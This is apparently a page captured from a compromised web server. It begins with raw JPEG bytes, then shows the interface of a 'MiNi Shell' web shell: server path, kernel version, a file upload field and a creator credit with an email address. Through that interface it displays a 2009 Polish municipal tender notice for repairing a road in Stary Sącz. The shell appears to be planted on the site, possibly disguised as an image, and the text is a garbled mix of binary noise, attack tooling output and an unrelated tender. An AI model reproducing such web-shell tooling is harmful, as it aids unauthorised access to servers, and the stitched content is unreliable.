JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090814/134091-N-2009.html

<p class="kh_header"><b>Stary Sącz: Remont odcinka drogi gminnej Osiedle-Do Lisów w Gołkowicach Dolnych w km 0+000 - 0+410</b><br>
<b>Numer ogłoszenia: 134091 - 2009; data zamieszczenia: 14.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta  i Gminy Stary Sącz , ul. Stefana Batorego 25, 33-340 Stary Sącz, woj. małopolskie, tel. 018 4460270, faks 018 4460273.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stary.sacz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont odcinka drogi gminnej Osiedle-Do Lisów w Gołkowicach Dolnych w km 0+000 - 0+410.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót związanych z remontem odcinka drogi gminnej Osiedle-Do Lisów w Gołkowicach Dolnych  na odcinku dł. 410 mb.

W zakres robót wchodzi:
- odbudowa podbudowy, warstwy dolnej z kruszyw naturalnych
- wykonanie nawierzchni tłuczniowej
- wykonanie nawierzchni z mieszanki mineralno-bitumicznej , warstwy ścieralnej gr. 6 cm 
- utwardzenie poboczy
Szczegółowy zakres robót określono w przedmiarze robót.

Zamówienie publiczne obejmuje wykonanie robót budowlanych wg :  
- dokumentacji projektowej - w wersji papierowej, dostępnej do wglądu w Urzędzie Miejskim                 w Starym  Sączu  (pokój nr 16 - I piętro) codziennie,  z wyjątkiem dni  ustawowo wolnych od pracy w  godzinach  od  8.00 do 15.00.
- specyfikacji technicznej wykonania i odbioru robót,
- przedmiaru robót,
- wizji lokalnej w miejscu realizacji zamówienia publicznego.

Do obowiązków Wykonawcy należeć będzie również ;
-  organizacja placu budowy,
- zabezpieczenie placu budowy przed dostępem osób trzecich,
- prowadzenie robót budowlanych zgodnie z zasadami Kodeksu Pracy oraz przy przestrzeganiu zasad bhp, 
ochrony zdrowia i środowiska oraz ochrony przeciwpożarowej,
- pokrycie kosztów zużycia energii elektrycznej i wody,
- pokrycie kosztów związanych z wyłączeniem lub uszkodzeniem mediów w trakcie prowadzonych robót 
   budowlanych,
- pokrycie kosztów obsługi geodezyjnej oraz wykonania budowlanej dokumentacji powykonawczej, inwentaryzacji foto-wizyjnej,
- pokrycie kosztów odtworzenia ogrodzeń, nasadzeń,
- pokrycie kosztów prób oraz wydatków związanych z organizacją końcowego odbioru  technicznego robót 
  budowlanych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki udziału w postępowaniu o udzielenie zamówienia publicznego. 
1.1. spełnianie wymogów określonych w art. 22 ust.1 ustawy P.z.p. z dnia 29 stycznia 2004 r.  (t.j. Dz.U. z 2007 r. Nr 223,  poz.1655, z późniejszymi zmianami) 
1.2. udzielenie 36 miesięcznej pisemnej gwarancji jakości na wykonany przedmiot zamówienia oraz 36 miesięcznej rękojmi licząc od dnia przyjęcia przedmiotu zamówienia przez Zamawiającego,
1.3. nie podleganie wykluczeniu z postępowania na podstawie art. 24 ustawy P.z.p. z dnia 29 stycznia 2004 r.(t.j. z 2007 r. Dz.U. Nr 223, poz.1655, z późniejszymi zmianami).
1.4. posiadanie niezbędnej wiedzy, uprawnień i doświadczenia oraz potencjału technicznego, a także dysponowanie osobami zdolnymi do wykonania zamówienia. 
- Wykonawca zrealizował w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, roboty budowlane odpowiadające zakresem i wartością przedmiotowi zamówienia 
-   Wykonawca posiada (ma do dyspozycji) narzędzia i urządzeni do wykonania zamówienia,                         
- Wykonawca ma do dyspozycji wykwalifikowany personel przynajmniej 1 osobę posiadającą uprawnienia budowlane do kierowania robotami budowlanymi zgodnymi z przedmiotem zamówienia - uprawnienia drogowe oraz aktualne zaświadczenie Okręgowej Izby Inżynierów Budownictwa.
		
2. Ocena spełnienia warunków udziału w postępowaniu. 
Z postępowania o udzielenie zamówienia publicznego wyklucza się wykonawców, którzy: 
2.1. nie spełniają warunków udziału w postępowaniu o zamówienie publiczne określonych w art.24 ust.1, pkt 1 - 10 Ustawy - Pzp 
2.2. wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców nie utrudni uczciwej konkurencji. 
2.3. złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania. 2.4. nie złożyli oświadczenia o spełnieniu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnienie tych warunków lub złożone dokumenty zawierają błędy z zastrzeżeniem art. 26 ust.3. 
2.4. W zakresie posiadania uprawnień do wykonywania określonej działalności i nie podlegania wykluczeniu na podstawie art. 24 Pzp  pod uwagę będą brane oferty, w których udokumentowano zgodność prowadzonej działalności gospodarczej z zakres objętym przedmiotem zamówienia.
2.5. Zamawiający zastrzega sobie prawo szczegółowego sprawdzenia stanu faktycznego z przedłożonymi dokumentami, w tym również poprzez wezwanie Oferenta do wyjaśnienia treści dokumentów.
2.6. Zamawiający wzywa Oferentów, którzy w określonym terminie nie złożyli wymaganych przez 
Zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25, ust.1 Pzp, lub którzy nie złożyli pełnomocnictw albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25, ust. Pzp zawierające błędy, lub którzy złożyli wadliwe pełnomocnictwa do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Oferenta podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Oferenta warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert.

Zamawiający dokona sprawdzenia spełnienia przez Oferentów wymogów określonych w ustawie - Prawo zamówień publicznych i specyfikacji w zakresie kompletności i jakości oferty, a mianowicie pod uwagę będą brane oferty zawierające komplet ważnych oświadczeń i dokumentów wymaganych niniejszą specyfikacją.
Ocena spełnienia w/w warunków zostanie dokonana zgodnie z formułą spełnia nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wymaganych w SIWZ.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.1.  formularz oferty (zał. nr 1 ). 
1.2.  kosztorys ofertowy z cenami jednostkowymi (zał. nr 8 )
        Kosztorys ofertowy musi zawierać :
        a) tabelę elementów scalonych obejmującą co najmniej wydzielone elementy, zgodne
            z  wykazem przedmiarów,
        b) zbiorcze zestawienie materiałów, sprzętu i robocizny,
        c) wyszczególnienie składników kalkulacyjnych ceny tj : robocizny, kosztów  ogólnych, zysku.
1.3.  oświadczenie o spełnieniu warunków udziału w postępowaniu na podstawie art.22 ust.1 Ustawy - Pzp ( zał. nr 2) 
1.4.  zaparafowany projekt umowy ( zał. nr 6)
1.5. aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej (kserokopie) wystawionego nie wcześniej niż 6 miesięcy przed terminem składania ofert, 
1.6. aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenia zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego wystawionych nie wcześniej niż 3 miesiące przed terminem składania ofert 
1.7. umowę spółki cywilnej, jeżeli działalność gospodarcza przedsiębiorców prowadzona jest w formie spółki cywilnej, 
1.8. wykaz wykonanych w okresie ostatnich pięciu lat robót budowlanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich wartości oraz daty i miejsca wykonania oraz dokumentów potwierdzających, że roboty zostały wykonane należycie (zał. nr 3) 
       Dokumenty-referencje od poprzednich zamawiających muszą określać termin realizacji, zakres, rodzaj i wartość usług oraz potwierdzenie, że zostały wykonane z należytą starannością.
1.9. wykaz niezbędnych do wykonania zamówienia maszyn i urządzeń jakimi dysponuje Wykonawca - (zał. nr 4), 
1.10.informację o kierowniku robót (zał. nr 5), informacja musi zawierać dane na temat osób kwalifikacji osób wskazanych do kierowania robotami wraz z dołączonymi kopiami uprawnień do sprawowania samodzielnych funkcji w budownictwie i aktualnym dokumentem potwierdzającym przynależność do Polskiej izby Inżynierów Budownictwa. 
1.11.polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej o wartości nie mniejszej niż  200.000,00 PLN. 

2.    Oferta składana przez dwa lub więcej podmioty gospodarcze musi spełniać następujące wymagania: 
2.1   zawierać dokumenty i oświadczenia wymienione w pkt 1.3-1.9, 1.11 od każdego podmiotu, 
2.2   musi być podpisana w taki sposób, by zobowiązywała prawnie wszystkie strony, 
2.3 jeden z podmiotów zostanie wyznaczony jako odpowiedzialny i jego upoważnienie będzie udokumentowane pełnomocnictwem podpisanym przez upełnomocnionych przedstawicieli pozostałych podmiotów oraz 
2.4. zawierać umowę pro forma spółki, która stwierdza, że wszystkie podmioty będą solidarnie odpowiedzialne prawnie za realizację umowy, 

Wszystkie w/w dokumenty mogą być złożone w formie oryginałów luk kserokopii potwierdzonych za zgodność przez wykonawcę lub osobę uprawnioną do podpisania oferty z dopiskiem - za zgodność z oryginałem.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.stary.sacz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Starym Sączu ul. Stefana Batorego 25 33-340 Stary Sącz - pok. 16 (I piętro).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2009 godzina 08:45, miejsce: Urząd Miejski w Starym Sączu ul. Stefana Batorego 25 33-340 Stary Sącz - sekretariat (I piętro).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com